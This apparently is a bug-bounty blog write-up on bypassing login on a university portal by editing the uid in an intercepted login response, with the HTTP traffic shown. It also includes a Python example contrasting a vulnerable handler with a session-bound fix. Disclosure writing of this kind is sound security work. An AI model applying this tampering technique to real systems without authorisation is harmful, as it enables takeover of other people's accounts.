How I found an IDOR at a University Portal in 10 minutes!
As I was just messing around with my cousin’s Institute Portal, I noticed its login area and got curious to test its functionality.
I got his credentials for that portal and intercepted the login request in Burp Suite. The request looked like this:
POST /login/process HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
router-path: /
Content-Type: application/json;charset=utf-8
Content-Length: 74
Origin: https://target.com
Connection: close
Referer: https://target.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
{"uid":"attacker@outlook.com","pass":"Pass@123","dns":"target.com"}
After that, I captured the response to the request shown above. This is the response I got:
HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310
{"policy_read":true,"msg":"200","uid":"attacker@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}
I noticed that the response includes the email along with a token.
Still, who knows if that token is actually doing anything?!!
So, on my phone, I created another account on the same portal with a different email, “victim@outlook.com”.
After registering it successfully, I manipulated the response shown above by replacing the attacker’s email value with the email of the new victim account. After the change, the response looked like this:
HTTP/1.1 200
Date: Thu, 19 Jan 2023 12:42:35 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Server: nginx/1.18.0
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 310
{"policy_read":true,"msg":"200","uid":"victim@outlook.com","awspath":"https://(xxxx).amazonaws.com/","token":"somevalue3212"}
I forwarded the manipulated response and, guess what?!
I was logged in to the victim account!!
I understood that the token used here was of NO USE: the application took the identity from the uid value rather than from the token!!
I created a POC of the bug and reported it to the Institute.
The token made it seem like this wouldn’t be possible, but uncertainty still exists, so we took the chance and it worked out ;)
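To show why the swapped uid worked, here is an added example of my own (not the portal’s code): a backend that trusts the client-supplied uid, next to one that derives the identity only from the server-side session the token was bound to at login. The account list, handler names and session store are constructed for the illustration.

```python
import hmac
import secrets

# Constructed sample accounts (plaintext only to keep the example short).
USERS = {
    "attacker@outlook.com": "Pass@123",
    "victim@outlook.com": "OtherPass#456",
}

# token -> uid, filled in server-side at login; this binding is what the
# vulnerable pattern never consults.
SESSIONS = {}


def login(uid, password):
    """Verify credentials and issue a random token bound to this uid."""
    stored = USERS.get(uid)
    if stored is None or not hmac.compare_digest(stored, password):
        return None
    token = secrets.token_urlsafe(16)
    SESSIONS[token] = uid
    return {"policy_read": True, "msg": "200", "uid": uid, "token": token}


def vulnerable_profile(request):
    """Pattern from the write-up: identity comes from the uid the client sends;
    the token is carried along but never checked, so any uid is honoured."""
    return {"msg": "200", "uid": request["uid"]}


def hardened_profile(request):
    """Fix: identity comes only from the session the token maps to."""
    uid = SESSIONS.get(request.get("token"))
    if uid is None:
        return {"msg": "401"}  # unknown or missing token
    # A uid that disagrees with the session is a tampering signal worth logging.
    if "uid" in request and request["uid"] != uid:
        return {"msg": "403"}
    return {"msg": "200", "uid": uid}


def demo():
    """Replay the write-up: log in as attacker, then present the victim's uid
    with the attacker's token to both handlers."""
    resp = login("attacker@outlook.com", "Pass@123")
    tampered = {"uid": "victim@outlook.com", "token": resp["token"]}
    return vulnerable_profile(tampered)["uid"], hardened_profile(tampered)["msg"]
```

The vulnerable handler returns the victim’s uid, while the hardened one rejects the mismatch, which is the behaviour the portal should have shown.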
Happy Hacking !!
#bugbounty #ethicalhacking #cybersecurity #vulnerability